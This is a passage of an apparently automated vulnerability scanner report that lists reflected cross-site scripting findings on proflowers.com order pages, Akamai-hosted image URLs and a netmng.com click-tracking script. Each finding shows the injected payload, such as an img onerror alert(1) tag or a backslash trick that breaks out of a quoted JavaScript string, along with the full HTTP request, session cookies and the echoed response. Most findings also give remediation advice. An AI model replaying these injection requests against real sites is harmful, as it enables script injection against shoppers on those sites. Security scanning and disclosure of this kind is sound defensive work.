HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/p0007703b7cd4b<img src=a onerror=alert(1)>1abce527698

4.165. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b9a40<img%20src%3da%20onerror%3dalert(1)>618e53e1f8f was submitted in the REST URL parameter 9. This input was echoed as b9a40<img src=a onerror=alert(1)>618e53e1f8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868bb9a40<img%20src%3da%20onerror%3dalert(1)>618e53e1f8f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/p0074868bb9a40<img src=a onerror=alert(1)>618e53e1f8f

4.166. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a461f<img%20src%3da%20onerror%3dalert(1)>5417133fe9d was submitted in the REST URL parameter 9. This input was echoed as a461f<img src=a onerror=alert(1)>5417133fe9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749ba461f<img%20src%3da%20onerror%3dalert(1)>5417133fe9d?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/p0084749ba461f<img src=a onerror=alert(1)>5417133fe9d

4.167. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ebe78<img%20src%3da%20onerror%3dalert(1)>d7b15d166f5 was submitted in the REST URL parameter 9. This input was echoed as ebe78<img src=a onerror=alert(1)>d7b15d166f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tnebe78<img%20src%3da%20onerror%3dalert(1)>d7b15d166f5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 87
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:26 GMT
Connection: close

Unable to find /ProvideCommerce/palepink_tnebe78<img src=a onerror=alert(1)>d7b15d166f5

4.168. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e946f<img%20src%3da%20onerror%3dalert(1)>871e3e70b86 was submitted in the REST URL parameter 9. This input was echoed as e946f<img src=a onerror=alert(1)>871e3e70b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tne946f<img%20src%3da%20onerror%3dalert(1)>871e3e70b86?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:29 GMT
Connection: close

Unable to find /ProvideCommerce/summerchocolates08_tne946f<img src=a onerror=alert(1)>871e3e70b86

4.169. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload caf6c<img%20src%3da%20onerror%3dalert(1)>ef775a487ff was submitted in the REST URL parameter 9. This input was echoed as caf6c<img src=a onerror=alert(1)>ef775a487ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tncaf6c<img%20src%3da%20onerror%3dalert(1)>ef775a487ff?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:18:55 GMT
Connection: close

Unable to find /ProvideCommerce/zinc08_tncaf6c<img src=a onerror=alert(1)>ef775a487ff

4.170. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b464'%3balert(1)//95044cf71dc was submitted in the u parameter. This input was echoed as 8b464';alert(1)//95044cf71dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=8b464'%3balert(1)//95044cf71dc HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CMEacUnu%2BdlVAnlb0EJqADUPwdEWLwFVt1YkusdXa%2FyG4PDMmwT%2Bp04eahs%2BgOi%2BCY9F8sJ1N5rP7C5Tcb6%2BH1tPYzqeBSrsgO%2FIVnhaSvpJm5%2FDT0Ajp8kznUSNzkVywo4QxpKsftt8R5jf0pDOjFkH3uJy8CgNSN5gRv3ZgKClRVzaPtdufl67Wm9PuOAAQRJYlAbyAfeEbfybOFvnJNK26bhsFqut4RfCugAAIH9Thyf7tC%2FaFjZR6%2F4Xe3KWE9CjAfOduuB6WLWUvJbSzsEWNZmsH81p0aGPaG8iWRByF0XMlYG51oqOMDXV2iLvcha3GW5DrzVhwxSGnknALfg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1244
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split('/')[2]){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=0&u=8b464';alert(1)//95044cf71dc';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

4.171. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc107\"%3balert(1)//ec98c73342e was submitted in the trackingpgroup parameter. This input was echoed as fc107\\";alert(1)//ec98c73342e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPCfc107\"%3balert(1)//ec98c73342e&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:27 GMT
Content-Length: 46950


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPCfc107\\";alert(1)//ec98c73342e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.172. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7636d\"%3balert(1)//578657e5ceb was submitted in the trackingpgroup parameter. This input was echoed as 7636d\\";alert(1)//578657e5ceb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_carousel&selectedrelationshipID=428685&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=HPC7636d\"%3balert(1)//578657e5ceb&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:24:55 GMT
Content-Length: 46950


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPC7636d\\";alert(1)//578657e5ceb"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.173. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f840e\"%3balert(1)//9623d7271fc was submitted in the trackingpgroup parameter. This input was echoed as f840e\\";alert(1)//9623d7271fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

POST /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBSf840e\"%3balert(1)//9623d7271fc&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
Origin: https://orders.proflowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE
Content-Length: 8113

SERVERNAME=ORDER01&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JnBK5JoLsH11eKYPAAbCB9J4CE%2BfEs%2B2jrNxmtLrGIH7KjQenTcoo%2F%2BLYNTaHsT3d%2FkIMPksdO3qKV6sxrf%2ByMhJ20SJav0TObp85l31XC5kQm7gF3Y%2FXdlJicN
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:36:44 GMT
Content-Length: 50700


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBSf840e\\";alert(1)//9623d7271fc"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event6";

   if ("" != "") {
       events +
...[SNIP]...

4.174. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb909\"%3balert(1)//3c15789ae2e was submitted in the trackingpgroup parameter. This input was echoed as cb909\\";alert(1)//3c15789ae2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

